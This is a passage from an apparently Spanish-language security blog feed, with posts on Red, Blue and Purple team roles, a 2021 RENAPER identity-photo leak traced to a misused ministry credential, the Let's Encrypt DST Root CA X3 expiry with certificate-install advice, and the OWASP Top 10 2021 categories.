ya que en la mayoría de los casos se trata de modos de pensar o funciones, en
lugar de grupos de personas dedicadas. El Amarillo, por ejemplo, ya tiene un
nombre: se llaman Desarrolladores.
</p>
<p>Un resumen de los colores de las funciones de seguridad</p>
<p></p>
<ul style="text-align: left;">
<li><span style="color: #fcff01;">Yellow</span> = Constructor</li>
<li><span style="color: red;">Red</span> = Atacante</li>
<li><span style="color: #2b00fe;">Blue</span> = Defensor</li>
<li>
<span style="color: lime;">Green</span> = el Constructor aprende del
Defensor
</li>
<li>
<span style="color: #800180;">Purple</span> = el Defensor aprende del
Atacante
</li>
<li>
<span style="color: #ffa400;">Orange</span> = el Constructor aprende del
Atacante
</li>
</ul>
<p></p>
<h3 style="text-align: left;">
Problemas comunes con las interacciones del equipo rojo y azul
</h3>
<p>
Lo ideal es que los equipos rojo y azul trabajen en perfecta armonía entre sí,
como dos manos que forman la capacidad de aplaudir. Al igual que el Yin y el
Yang o el Ataque y la Defensa, los equipos Rojo y Azul no podrían ser más
opuestos en sus tácticas y comportamientos, pero estas diferencias son
precisamente las que los hacen parte de un todo sano y eficaz. Los Equipos
Rojos atacan y los Equipos Azules defienden, pero el objetivo principal es
compartido entre ellos: mejorar la postura de seguridad de la organización.
</p>
<p>
Algunos de los problemas comunes con la cooperación del equipo Rojo y Azul
incluyen:
</p>
<p></p>
<ul style="text-align: left;">
<li>
El equipo Rojo se considera demasiado élite para compartir información con
el Equipo Azul.
</li>
<li>
El equipo Rojo es empujado dentro de la organización y se neutraliza,
restringe y desmoraliza, lo que finalmente resulta en una reducción
catastrófica en su efectividad.
</li>
<li>
El equipo Rojo y el equipo Azul no están diseñados para interactuar entre sí
de forma continua, como una cuestión de rutina, por lo que las lecciones
aprendidas de cada lado se pierden efectivamente.
</li>
<li>
La administración de seguridad de la información no ve al equipo Rojo y Azul
como parte del mismo esfuerzo, y no hay información, administración o
métricas compartidas entre ellos.
</li>
</ul>
<p></p>
<p>
Es más probable que las organizaciones que sufren de una o más de estas
dolencias piensen que necesitan un Equipo Púrpura para resolverlas. Pero
"Purple" debe considerarse como una función o un concepto, más que como un
equipo adicional permanente. Y ese concepto es cooperación y beneficio mutuo
hacia un objetivo común.
</p>
<p>
Entonces, tal vez haya un compromiso del Equipo Púrpura, donde un tercero
analiza cómo sus equipos Rojo y Azul trabajan entre sí y recomienda
soluciones. O tal vez haya un ejercicio del equipo Púrpura, donde alguien
monitorea ambos equipos en tiempo real para ver cómo funcionan. O tal vez haya
una reunión del equipo Púrpura, donde los dos equipos se unen, comparten
historias y hablan sobre varios ataques y defensas.
</p>
<p>
<b>El tema unificador es lograr que el equipo Rojo y Azul estén de acuerdo en
su objetivo compartido de mejora organizacional y no introducir otra entidad
más en la mezcla.</b>
</p>
<p>
Piense en Purple Team como un consejero matrimonial. Está bien que alguien
actúe en ese papel para arreglar la comunicación, pero bajo ninguna
circunstancia debe decidir que la nueva forma permanente para que el esposo y
la esposa se comuniquen es a través de un mediador.
</p>
<h3 style="text-align: left;">Resumen</h3>
<p></p>
<ul style="text-align: left;">
<li>
Los Red Teams emulan a los atacantes para encontrar fallas en las defensas
de las organizaciones para las que trabajan.
</li>
<li>
Los Blue Teams se defienden de los atacantes y trabajan para mejorar
constantemente la postura de seguridad de su organización.
</li>
<li>
Una implementación del Red/Blue Team que funcione correctamente incluye el
intercambio regular de conocimientos entre los equipos para permitir la
mejora continua de ambos.
</li>
<li>
Los Purple Team se utilizan a menudo para facilitar esta integración
continua entre los dos grupos, que no aborda el problema central de que los
equipos rojo y azul no comparten información. El equipo Púrpura debe
conceptualizarse como una función de cooperación o un punto de interacción,
y no como una entidad superada e idealmente redundante.
</li>
<li>
En una organización madura, todo el propósito del equipo Rojo es mejorar la
efectividad del equipo Azul, por lo que el valor proporcionado por el equipo
Púrpura debería ser parte natural de su interacción en lugar de ser forzado
a través de una entidad adicional.
</li>
<li>
Si combina Amarillo (Constructores) con Rojo y Azul, puede terminar con
otras funciones, como Verde y Naranja, que ayudan a difundir la mentalidad
de atacante y defensor a otras partes de la organización.
</li>
</ul>
<p></p>
<h3 style="text-align: left;">Notas</h3>
<p>
Todos estos términos pueden aplicarse a cualquier tipo de operación de
seguridad, pero estas definiciones específicas están sintonizadas con la
seguridad de la información.
</p>
<p>
Fuente:
<a href="https://danielmiessler.com/study/red-blue-purple-teams/" rel="nofollow" target="_blank">Daniel Miessler</a>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-87143959603728275692021-10-13T16:45:00.003-03:002021-10-13T18:02:47.333-03:00Documentos argentinos a la venta. Desmienten que se hayan hackeado la web de los DNI<p>
Luego de que circularan en redes sociales capturas de pantallas que mostraban
un presunto hackeo a la base de datos del Registro Nacional de las Personas
(RENAPER), que cuenta con los datos de los DNI de las más de 45 millones de
personas en el país, el organismo aseguró que sus sistemas de seguridad
informática no fueron vulnerados. Según el RENAPER, hubo un uso indebido de una clave otorgada a un organismo público y se formalizó una denuncia penal
</p>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="429" data-original-width="800" height="343" src="https://pbs.twimg.com/media/FBlmxlzXsAYL9Nj?format=jpg&name=medium" width="640" />
</div>
<p>
Desde el organismo dijeron:
<i>"El Registro Nacional de las Personas formalizó ayer una denuncia penal
ante el Juzgado en lo Criminal y Correccional Federal N° 11 Secretaria N° 22
tras detectar que, mediante el uso de claves otorgadas a organismos
públicos, en este caso el Ministerio de Salud, se filtraron imágenes como
perteneciente a trámites personales realizados en el RENAPER. Desde el
organismo dependiente del Ministerio del Interior se confirmó que se trató
de un uso indebido de usuario o robo de la clave del mismo, y que la base de
datos no sufrió vulneración o filtración alguna de datos"</i>.
</p>
<p>
<a href="https://www.lanacion.com.ar/tecnologia/preocupacion-por-la-venta-de-los-datos-de-millones-de-argentinos-que-tiene-el-registro-nacional-de-nid13102021/">El sábado 9 de octubre el RENAPER tomó conocimiento</a>
de que un usuario de Twitter identificado con el nombre de <i>@aniballeaks</i>
-cuenta que fue denunciada y que actualmente se encuentra suspendida- había
publicado en dicha red social las imágenes de 44 individuos, entre los cuales
se encontraban funcionarios y personajes públicos de conocimiento en general”,
explicaron desde el organismo que depende de Ministerio de Interior.
</p>
<p>
Según su versión, algunas de las publicaciones poseerían el número de trámite
del Documento Nacional de Identidad asociado a dicha imagen.
<i>"De un primer análisis, se pudo identificar a las imágenes como
perteneciente a trámites personales realizados en el Registro Nacional de
las Personas"</i>, agregaron.
</p>
<p>
<i>"Confirmando lo sucedido, el equipo de seguridad informática del RENAPER
realizó una consulta sobre las 44 personas involucradas a fin de relevar los
últimos consumos realizados mediante el uso del Sistema de Identidad Digital
(SID) sobre dichos perfiles, detectando que 19 imágenes habían sido
consultadas en el exacto momento que eran publicadas en la red social
Twitter desde una conexión autorizada de VPN (Virtual Private Network) entre
el RENAPER y el Ministerio de Salud de la Nación, y todas las imágenes
habían sido consultadas recientemente desde esa misma conexión"</i>, indicaron.
</p>
<p>
Tras ese protocolo lograron determinar que
<i>"dicha conexión habría realizado varias consultas individuales a las bases
de datos del Renaper entre las 15:01 y las 15:55 mediante el servicio de
validación de datos del SID el cual, una vez invocados el DNI y Sexo de la
persona, devuelve a la persona que consulta todos los datos impresos en el
Documento Nacional de Identidad, incluyendo imagen y otros datos personales,
los cuales luego fueron subidos inmediatamente a la red social Twitter, sin
el consentimiento del Titular de los mismos"</i>.
</p>
<p>
Luego de este análisis preliminar, confirmaron los especialistas, se descartó
de plano un ingreso no autorizado a los sistemas o una filtración masiva de
datos del organismo", aseguró el RENAPER, y agregó:
<i>"Asimismo, se detectó que un usuario autorizado individual habría utilizado
de forma indebida para fines personales el servicio de validación de
identidad a través de un certificado habilitado del Ministerio de Salud de
la Nación, conectándose a través de la correspondiente VPN, con usuario y
contraseña"</i>.
</p>
<p>
Según pudo saber este medio son ocho las personas que pertenecen a la cartera
que dirige Carla Vizzotti que quedaron bajo la lupa judicial. Esto es porque
eran quienes tenían acceso a la clave desde la cual se hicieron las consultas
que luego se publicaron en redes sociales.
</p>
<p>
Fuente:
<a href="https://www.lanacion.com.ar/sociedad/tras-un-confuso-episodio-desmienten-que-se-haya-hackeado-la-web-con-los-datos-de-todos-los-dni-del-nid13102021/">La Nación</a>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com4tag:blogger.com,1999:blog-14423462.post-45723821621829615172021-09-28T20:18:00.016-03:002021-10-02T20:22:06.910-03:00Se vence un certificado raíz ¿Apagón de Internet? Naaa<p>
Este miércoles 30 de septiembre está programado un apagón de Internet. ¿Para
tanto? En realidad <u>no</u>. Este "apagón" sucederá normalmente debido al
vencimiento de un certificado digital.
</p>
<p>
El 30 de septiembre de 2021, el certificado raíz que
<a href="https://letsencrypt.org/docs/certificate-compatibility/" rel="nofollow" target="_blank">Let's Encrypt está utilizando actualmente</a>, el
<a href="https://scotthelme.co.uk/lets-encrypt-old-root-expiration/" rel="nofollow" target="_blank">certificado <b>IdentTrust DST Root CA X3</b>, caducará</a>. Todos los certificados que impulsan HTTPS en la web son emitidos por una
CA, una organización de confianza reconocida por su dispositivo / sistema
operativo.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="428" data-original-width="800" height="342" src="https://scotthelme.co.uk/content/images/size/w1000/2021/09/image-5.png" width="640" />
</div>
<p>
Estos certificados están integrados en todos los sistemas operativos y
generalmente se actualizan como parte del proceso normal de actualización de
su sistema operativo. El certificado aquí que va a causar un problema es este,
el IdenTrust DST Root CA X3.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="515" data-original-width="405" height="640" src="https://scotthelme.co.uk/content/images/2021/09/image-6.png" width="503" />
</div>
<p>
Como se puede ver, el tiempo corre y nos acercamos a la fecha de vencimiento
del 30 de septiembre de 2021, pero no es solo una fecha de vencimiento, es una
marca de tiempo de vencimiento que llamamos <i>notAfter. </i>Una vez que
esta CA raíz haya expirado, los clientes, como los navegadores web, ya no
confiarán en los certificados emitidos por esta CA.
</p>
<p>
Esta no es la primera vez que caduque un certificado de CA raíz, ni será la
última. Si el certificado raíz en el que se ancla la cadena de certificados ha
caducado, es muy probable que falle. Esto sucedió el año pasado, el 30 de mayo
a las 10:48:38 2020 GMT para ser exactos, cuando la raíz externa de CA de
AddTrust expiró y se llevó puestas un montón de cosas: incluso
<a href="https://access.redhat.com/articles/5117881" rel="nofollow" target="_blank">RedHat tuvo algo que decir</a>
sobre el evento.
</p>
<p>
<b>En circunstancias normales, no valdría la pena hablar de este evento, una
CA raíz que expira, porque la transición de un certificado raíz antiguo a un
certificado raíz nuevo es completamente transparente. La razón por la que
tenemos un problema <u>es porque los clientes no se actualizan</u> con
regularidad y, si el cliente no se actualiza, la nueva CA raíz que reemplaza
a la antigua CA raíz que vence no se descarga en el dispositivo.</b>
</p>
<p>
Solo en el último año,
<a href="https://letsencrypt.org/2020/11/06/own-two-feet.html" rel="nofollow" target="_blank">Let's Encrypt ha aumentado</a>
bastante su participación en el mercado y, a medida que una CA se hace más
grande, sus certificados permiten que funcione más la Web y, como resultado,
cuando surge algo como esto, tienen el potencial de causar más problemas. Esto
no tiene nada que ver con lo que Let's Encrypt ha hecho, o no ha hecho,
todavía se reduce al
<b>mismo problema subyacente de que los dispositivos en el ecosistema no se
actualizan como deberían</b>.
</p>
<h3 style="text-align: left;">¿Qué dispositivos dejarán de funcionar?</h3>
<p>
Todos los dispositivos que cuenten con ese certificado raíz perderán su
conectividad:<br />
</p>
<ul style="text-align: left;">
<li>
Uno de los clientes notables que se verá afectado por este vencimiento es
cualquier cosa que dependa de la biblioteca <b>OpenSSL 1.0.2 o anterior</b>,
la versión del 22 de enero de 2015 y la última actualización como OpenSSL
1.0.2u el 20 de diciembre de 2019.
<a href="https://www.openssl.org/blog/blog/2021/09/13/LetsEncryptRootCertExpire/" rel="nofollow" target="_blank">OpenSSL ha publicado</a>
una nora en el blog que detalla qué acciones pueden tomar los afectados,
pero todos requieren una intervención manual para evitar roturas.
</li>
<li>OpenSSL <= 1.0.2</li>
<li>Windows < XP SP3</li>
<li>macOS < 10.12.1</li>
<li>iOS < 10 (iPhone 5 is the lowest model that can get to iOS 10)</li>
<li>
Android < 7.1.1 (but >= 2.3.6 will work if served ISRG Root X1
cross-sign)
</li>
<li>Mozilla Firefox < 50</li>
<li>Ubuntu < 16.04</li>
<li>Debian < 8</li>
<li>Java 8 < 8u141</li>
<li>Java 7 < 7u151</li>
<li>NSS < 3.26</li>
<li>Amazon FireOS (Silk Browser)</li>
</ul>
<p>Estas aplicaciones <u>probablemente</u> también dejen de funcionar:</p>
<ul>
<li>Cyanogen > v10</li>
<li>Jolla Sailfish OS > v1.1.2.16</li>
<li>Kindle > v3.4.1</li>
<li>Blackberry >= 10.3.3</li>
<li>PS4 game console with firmware >= 5.00</li>
<li>
IIS [<a href="https://twitter.com/webprofusion/status/1440125924427517954">1</a>] [<a href="https://twitter.com/Collab_Seth/status/1440171169659834376">2</a>]
</li>
</ul>
<h3 style="text-align: left;">
¿Cómo evitar que mi dispositivo deje de funcionar?
</h3>
<p>
La solución consiste en actualizar los controladores de los dispositivos.
<b>Los más modernos no tendrán ningún inconveniente</b> ya que las compañías
lanzan actualizaciones constantes para sus últimos productos.
</p>
<p>
Sin embargo, en muchos casos las empresas consideran obsoletos a sus productos
más viejos y no realizan un actualización de software, por lo que actualizar
el certificado <i>root</i> será difícil o imposible. Se estima que el 30% de
los celulares Android podrían quedar fuera de servicio.
</p>
<p>
En general,
<b>los productos fabricados a partir del 2017 no se verán afectados</b> ya que
la mayoría de ellos cuentan con el
<a href="https://censys.io/certificates/96bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c6" rel="nofollow" target="_blank">ISRG Root X1</a>, cuya fecha de caducidad es en junio de 2035.
</p>
<p style="text-align: center;">
<b><a href="https://expired-r3-test.scotthelme.co.uk/" rel="nofollow" target="_blank">Aquí se puede hacer una verificación de funcionamiento</a></b>
</p>
<h3 style="text-align: left;">Posible <a href="https://twitter.com/SeguInfo/status/1444442342358933513" rel="nofollow" target="_blank">Solución</a></h3>
<p>Descargar el certificado desde: <a href="https://letsencrypt.org/certificates/">https://letsencrypt.org/certificates/</a></p>
<p></p><ul style="text-align: left;"><li>
SRG Root X1 (RSA 4096, O = Internet Security Research Group, CN = ISRG Root X1:
<a href="https://crt.sh/?id=9314791">Self-signed</a>: <a href="https://letsencrypt.org/certs/isrgrootx1.der" rel="nofollow" target="_blank">der</a>, <a href="https://letsencrypt.org/certs/isrgrootx1.pem">pem</a>, <a href="https://letsencrypt.org/certs/isrgrootx1.txt" rel="nofollow" target="_blank">txt</a></li></ul><p></p><center>
<img src="https://i.imgur.com/7ToRrRo.png" /></center>
<p>
Luego almacenar el archivo con extensión <i>".crt"</i> o <i>".cer"</i> e instalarlo manualmente en el
equipo afectado.</p>
<p>
Fuente:
<a href="https://scotthelme.co.uk/lets-encrypt-old-root-expiration/" rel="nofollow" target="_blank">Scott Helme</a>
|
<a href="https://letsencrypt.org/2020/11/06/own-two-feet.html" rel="nofollow" target="_blank">Let's Encrypt</a>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com31tag:blogger.com,1999:blog-14423462.post-64090835006169637732021-09-09T08:24:00.006-03:002021-09-21T08:38:11.853-03:00Bienvenido OWASP Top 10 2021 (I)<p>
<b>El
<a href="https://owasp.org/Top10/" rel="nofollow" target="_blank">OWASP Top 10 2021</a>
es completamente <a href="https://www.owasptopten.org/" rel="nofollow" target="_blank">nuevo</a></b>, con un nuevo diseño gráfico y una infografía de una página disponible y
listo para imprimir.
<a href="https://owasp.org/Top10/0x00-notice/" rel="nofollow" target="_blank">El top aún se encuentra en DRAFT y se siguen recibiendo comentarios</a> y preparando la actualización gráfica, a tiempo para el lanzamiento
oficial del
<a href="https://20thanniversary.owasp.org/" rel="nofollow" target="_blank">vigésimo aniversario de OWASP (24/09)</a>.
</p>
<p>
Esta nueva entrega del Top 10 está más basada en datos que nunca, pero no solo
y ciegamente basada en datos. Se seleccionaron ocho de las diez categorías
desde los datos aportados y dos categorías desde una encuesta de la industria
de alto nivel. Se hace de sesta forma por una razón fundamental: mirar los
datos aportados es "mirar el pasado". Los investigadores de AppSec se toman su
tiempo para encontrar nuevas vulnerabilidades y nuevas formas de probarlas. Se
necesita tiempo para integrar estas pruebas en herramientas y procesos. Para
cuando se puede probar de manera confiable una debilidad a escala, es probable
que hayan pasado años. Para equilibrar ese punto de vista, se utiliza una
encuesta de la industria para preguntar a las personas en primera línea qué
ven como debilidades esenciales que los datos pueden no mostrar aún.
</p>
<p>
Hay algunos cambios críticos que adoptamos para continuar madurando en el Top
10.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="220" data-original-width="800" src="https://owasp.org/Top10/assets/image1.png" />
</div>
<h3 style="text-align: left;">¿Qué ha cambiado en el Top 10 para 2021?</h3>
<p>
Hay tres categorías nuevas, cuatro categorías con cambios de nomenclatura y
alcance, y cierta consolidación de algunas vulnerabilidades conocidas
previamente.
</p>
<ul style="text-align: left;">
<li>
<b> A01: 2021 - Broken Access Control</b> sube desde la quinta posición. En
el 94% de las aplicaciones que se probaron se detectó algún tipo de control
de acceso defectuoso. Los 34 CWE asignados a Broken Access Control tuvieron
más apariciones en aplicaciones que cualquier otra categoría.
</li>
<li>
<b>A02: 2021 - Fallos criptográficos</b> sube una posición al #2.
Anteriormente conocido como "Exposición de datos confidenciales", era un
síntoma amplio en lugar de una causa raíz. El enfoque renovado está en las
fallas relacionadas con la criptografía, que a menudo conducen a la
exposición de datos confidenciales o al compromiso del sistema.
</li>
<li>
<b>A03: 2021 - La inyección</b> baja a la tercera posición. El 94% de las
aplicaciones probadas tenían alguna forma de inyección, y los 33 CWE
mapeados en esta categoría tienen la segunda mayor cantidad de ocurrencias
en aplicaciones.
<b>Cross-site Scripting ahora forma parte de esta categoría</b>.
</li>
<li>
<b>A04: 2021 - Diseño inseguro</b> es una nueva categoría para 2021, con un
enfoque en los riesgos relacionados con fallas de diseño. Si realmente
queremos
<a href="https://dzone.com/articles/shifting-left-in-software-engineering" rel="nofollow" target="_blank">"movernos a la izquierda"</a>
como industria, se requiere un mayor uso del modelado de amenazas, patrones
y principios de diseño seguros y arquitecturas de referencia.
</li>
<li>
<b>A05: 2021 - La configuración incorrecta de seguridad</b> sube desde el
puesto 6 en la edición anterior. En el 90% de las aplicaciones que se
probaron se detectó algún tipo de configuración incorrecta. Con más cambios
en software altamente configurable, no es sorprendente ver que esta
categoría asciende. La categoría anterior de entidades externas XML (XXE)
ahora forma parte de esta categoría.
</li>
<li>
<b>A06: 2021 - Los componentes vulnerables y obsoletos</b> se titulaba
anteriormente "Uso de componentes con vulnerabilidades conocidas" y ocupa el
puesto número 2 en la encuesta de la industria, pero también tenía
suficientes datos para llegar al Top 10 a través del análisis de datos. Esta
categoría avanza desde el puesto 9 en 2017 y es un problema conocido que
cuesta probar y evaluar el riesgo.
</li>
<li>
<b>A07: 2021 - Fallas de identificación y autenticación</b> anteriormente era conocido como "pérdida de autenticación" y bajó
desde la segunda posición, y ahora incluye CWE que están más relacionados
con fallas de identificación. Esta categoría sigue siendo una parte integral
del Top 10, pero la mayor disponibilidad de marcos estandarizados parece
estar ayudando.
</li>
<li>
<b>A08: 2021 - Fallas de software e integridad de datos</b> es una
nueva categoría para 2021, que se centra en hacer suposiciones relacionadas
con actualizaciones de software, datos críticos y canalizaciones de CI/CD
sin verificar la integridad. Uno de los impactos más ponderados de los datos
de CVE/CVSS mapeados a los 10 CWE en esta categoría.
<b>La deserialización insegura de 2017 ahora es parte de esta categoría más
grande.</b>
</li>
<li>
<b>A09:2021 - Las fallas de registro y monitoreo</b> de seguridad de 2021
eran anteriormente "Registro y monitoreo insuficientes" y se agrega de la
encuesta de la industria, avanzando desde el puesto 10 anterior. Esta
categoría se amplía para incluir más tipos de fallas, es difícil de probar y
no está bien representada en los datos CVE/CVSS. Sin embargo, las fallas en
esta categoría pueden afectar directamente la visibilidad, las alertas de
incidentes y los análisis forenses.
</li>
<li>
<b>A10:2021 - La falsificación de solicitudes del lado del servidor
(Server-Side Request Forgery - SSRF)</b>
se agrega desde la encuesta de la industria. Los datos muestran una tasa de
incidencia relativamente baja con una cobertura de pruebas por encima del
promedio, junto con calificaciones por encima del promedio para el potencial
de Explotación e Impacto. Esta categoría representa el escenario en el que
los profesionales de la industria nos dicen que esto es importante, aunque
no está ilustrado en los datos en este momento.
</li>
</ul>
<h3 style="text-align: left;">Más información</h3>
<a href="https://owasp.org/Top10/A01_2021-Broken_Access_Control/"></a>
<ul style="text-align: left;">
<li>
<a href="https://owasp.org/Top10/A01_2021-Broken_Access_Control/">A01:2021 – Broken Access Control</a>
</li>
<li>
<a href="https://owasp.org/Top10/A02_2021-Cryptographic_Failures/">A02:2021 – Cryptographic Failures</a>
</li>
<li>
<a href="https://owasp.org/Top10/A03_2021-Injection/">A03:2021 – Injection</a>
</li>
<li>
<a href="https://owasp.org/Top10/A04_2021-Insecure_Design/">A04:2021 – Insecure Design</a>
</li>
<li>
<a href="https://owasp.org/Top10/A05_2021-Security_Misconfiguration/">A05:2021 – Security Misconfiguration</a>
</li>
<li>
<a href="https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/">A06:2021 – Vulnerable and Outdated Components</a>
</li>
<li>
<a href="https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/">A07:2021 – Identification and Authentication Failures</a>
</li>
<li>
<a href="https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/">A08:2021 – Software and Data Integrity Failures</a>
</li>
<li>
<a href="https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/">A09:2021 – Security Logging and Monitoring Failures</a>
</li>
<li>
<a href="https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/">A10:2021 – Server Side Request Forgery</a>
</li>
</ul>
<p>
Fuente:
<a href="https://owasp.org/Top10/" rel="nofollow" target="_blank">OWASP</a>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-28648082906568213022021-09-06T15:43:00.007-03:002021-10-17T11:07:14.025-03:00Red Team vs Blue Team vs Purple Team<div class="separator">
<div
class="separator"
style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"
>
<img
border="0"
data-original-height="698"
data-original-width="800"
height="279"
src="https://danielmiessler.com/images/BAD-pyramid-miessler.png"
width="320"
/>
</div>
</div>
<p>
Existe cierta confusión sobre las definiciones de los
<span style="color: red;">equipos ROJO</span>,
<i><span style="color: #2b00fe;">AZUL</span></i> y
<span style="color: #800180;">PÚRPURA</span> dentro de la seguridad de la
información. Aquí están mis definiciones y conceptos asociados con ellos.
</p>
<p>
Los
<b
><span style="color: red;"><i>Red Team</i></span></b
>
son entidades internas o externas dedicadas a probar la efectividad de un
programa de seguridad emulando las
<b>herramientas y técnicas de posibles atacantes</b> de la manera más realista
posible. La práctica es similar, pero no idéntica, a las pruebas de
penetración e implica la búsqueda de uno o más objetivos, generalmente
ejecutados como una campaña.
</p>
<p>
Los
<span style="color: #2b00fe;"
><i><b>Blue Team</b></i></span
>
se refieren al equipo de seguridad interno que
<b>defiende tanto de los atacantes reales como de los <i>red team</i>.</b> Los
<i>Blue Teams</i> deben distinguirse de los equipos de seguridad estándar en
la mayoría de las organizaciones, ya que la mayoría de los equipos de
operaciones de seguridad no tienen una mentalidad de vigilancia constante
contra los ataques, que es la misión y la perspectiva de un verdadero
<i>Blue Team</i>.
</p>
<p>
Los
<span style="color: #800180;"
><i
><a
href="https://danielmiessler.com/study/purple-team/"
rel="nofollow"
target="_blank"
><b>Purple Team</b></a
></i
></span
>
existen para asegurar y maximizar la efectividad de los equipos Rojo y Azul.
Lo hacen integrando las tácticas defensivas y los controles del Equipo Azul
con las amenazas y vulnerabilidades encontradas por el Equipo Rojo en una sola
narrativa que maximiza ambos. Idealmente,
<b
><i>Purple</i> no debería ser un equipo en absoluto, sino una dinámica
permanente entre <i>Red</i> y <i>Blue</i>.</b
>
</p>
<h3 style="text-align: left;"><span style="color: red;">Red Team</span></h3>
<p>
Los equipos rojos se confunden con mayor frecuencia con los <i>pentesters</i>,
pero aunque tienen una superposición enorme en habilidades y funciones,
<u>no</u> son lo mismo. Los equipos rojos tienen una serie de atributos que
los separan de otros equipos de seguridad ofensivos. Los más importantes entre
ellos son:
</p>
<p></p>
<ul style="text-align: left;">
<li>
Emulación de los TTP utilizados por los adversarios y que el objetivo
probablemente deberá enfrentar, por ejemplo, utilizando herramientas,
<i>exploits</i>, metodologías de pivots y objetivos similares como un actor
de amenaza determinado.
</li>
<li>
Pruebas basadas en campañas que se ejecutan durante un período de tiempo
prolongado, por ejemplo, varias semanas o meses para emular al mismo
atacante.
</li>
</ul>
<p>
Si un equipo de seguridad utiliza herramientas de <i>pentesting</i> estándar,
ejecuta sus pruebas durante solo una o dos semanas y está tratando de lograr
un conjunto estándar de objetivos, como ingresar a la red interna, robar datos
o obtener un administrador de dominio, entonces eso es un <i>pentest</i> y no
un compromiso de un <i>Red Team</i>. Los compromisos del
<i>red team</i> utilizan un conjunto personalizado de TTP y objetivos durante
un período de tiempo prolongado.
</p>
<p>
<b>
Los equipos rojos no solo prueban las vulnerabilidades, sino que lo hacen
utilizando los TTP de sus posibles actores de amenazas y en campañas que se
ejecutan de forma continua durante un período de tiempo prolongado.</b
>
</p>
<p>
Existe un debate sobre este punto dentro de la comunidad. Por supuesto, es
posible crear una campaña de <i>Red Team</i> que use los mejores TTP conocidos
y una combinación de herramientas, técnicas y objetivos comunes de
<i>pentesting</i>, y ejecutarlo como una campaña, modelando un adversario
<i>pentester</i>. Pero, la forma más pura de una campaña del Equipo Rojo emula
los TTP de un actor de amenazas específico, que no necesariamente será lo
mismo que si el Equipo Rojo se estuviera atacando a sí mismo.
</p>
<p>
Un equipo <b>Tiger</b> es similar, pero no lo mismo que un equipo rojo. Un
artículo de 1964 definió el término como <i
>"un equipo de especialistas técnicos no domesticados y desinhibidos,
seleccionados por su experiencia, energía e imaginación, y asignados para
rastrear implacablemente todas las posibles fuentes de fallas en el
subsistema de una nave espacial"</i
>. El término ahora se usa a menudo como sinónimo de Red Team, pero la
definición general es un grupo de élite de personas diseñadas para resolver un
desafío técnico en particular.
</p>
<p>
Es importante que los equipos Rojos mantengan una cierta separación de las
organizaciones que están probando, ya que esto es lo que les da el alcance y
la perspectiva adecuados para seguir emulando a los atacantes. Las
organizaciones que incorporan a los equipos Rojos, como parte de su equipo de
seguridad, tienden (con pocas excepciones) a erosionar lentamente la
autoridad, el alcance y la libertad general del equipo para operar como un
atacante real. Con el tiempo (a menudo solo unos meses), los equipos Rojos que
antes eran de élite y efectivos se vuelven limitados, obsoletos y, en última
instancia, impotentes.
</p>
<p>
Otro aspecto que conduce a la ineficacia de los equipos Rojos internos es que
los miembros de élite del equipo rara vez hacen una buena transición a las
culturas de las empresas con los medios para contratarlos. En otras palabras,
las empresas (grandes) que pueden permitirse un verdadero equipo Rojo tienden
a tener culturas que son difíciles o imposibles de manejar para los miembros
de élite del equipo Rojo. Esto a menudo conduce a un alto desgaste dentro de
los miembros internos del equipo que hacen la transición al interno.
</p>
<p>
Es técnicamente posible que un equipo Rojo interno sea efectivo; es muy poco
probable que puedan permanecer protegidos y respaldados en los niveles más
altos durante largos períodos de tiempo. Esto tiende a provocar erosión,
frustración y desgaste.
</p>
<p>
Una trampa en la que caen regularmente los equipos Rojos internos es la
reducción de poder y alcance hasta el punto de ser ineficaces, momento en el
que la gerencia recurre a consultores que cuentan con el apoyo total y que
regresan con un montón de "grandes hallazgos".
</p>
<h3 style="text-align: left;">
<span style="color: #2b00fe;">Blue Team</span>
</h3>
<p>
El objetivo aquí no es el control de la puerta, sino más bien el fomento de la
curiosidad y una mentalidad proactiva.
<b
>Los Blue Teams son los defensores proactivos de una empresa desde el punto
de vista de la ciberseguridad.</b
>
</p>
<p>
Hay una serie de tareas de InfoSec orientadas a la defensa que no se
consideran en general dignas de un equipo azul, por ejemplo, un analista de
nivel 1 de SOC que no tiene entrenamiento o interés en técnicas ofensivas, sin
curiosidad por lo que está buscando y falta de creatividad en el seguimiento
de posibles alertas.
</p>
<p>
Todos los equipos azules son defensores, pero no todos los defensores forman
parte de un equipo azul. Lo que diferencia a un Equipo Azul frente a hacer
cosas defensivas es la mentalidad:
</p>
<ul style="text-align: left;">
<li>Una mentalidad proactiva versus reactiva.</li>
<li>Curiosidad sin fin por las cosas fuera de lo común.</li>
<li>Mejora continua en detección y respuesta.</li>
</ul>
<p></p>
<p>
No se trata de si alguien es un analista de SOC de primer nivel autodidacta o
un ex miembro de Red Teamer de Carnegie Mellon. Se trata de curiosidad y deseo
de mejorar constantemente.
</p>
<h3 style="text-align: left;">
<span style="color: #800180;">Purple Team</span>
</h3>
<p>
<b>
Purple es una mentalidad cooperativa entre atacantes y defensores que
trabajan del mismo lado.</b
>
Como tal, debe considerarse como una función más que como un equipo dedicado.
</p>
<p>
El verdadero propósito de un Equipo Rojo es encontrar formas de mejorar el
Equipo Azul, por lo que los Equipos Púrpura no deberían ser necesarios en
organizaciones donde la interacción Equipo Rojo / Equipo Azul es saludable y
funciona correctamente.
</p>
<p>
Los mejores usos del término son aquellos en los que cualquier grupo que no
esté familiarizado con las técnicas ofensivas quiera aprender cómo piensan los
atacantes. Podría ser un grupo de respuesta a incidentes, un grupo de
detección, un grupo de desarrolladores, lo que sea. Si los buenos están
tratando de aprender de los atacantes, eso puede considerarse un ejercicio del
Equipo Púrpura.
</p>
<p>
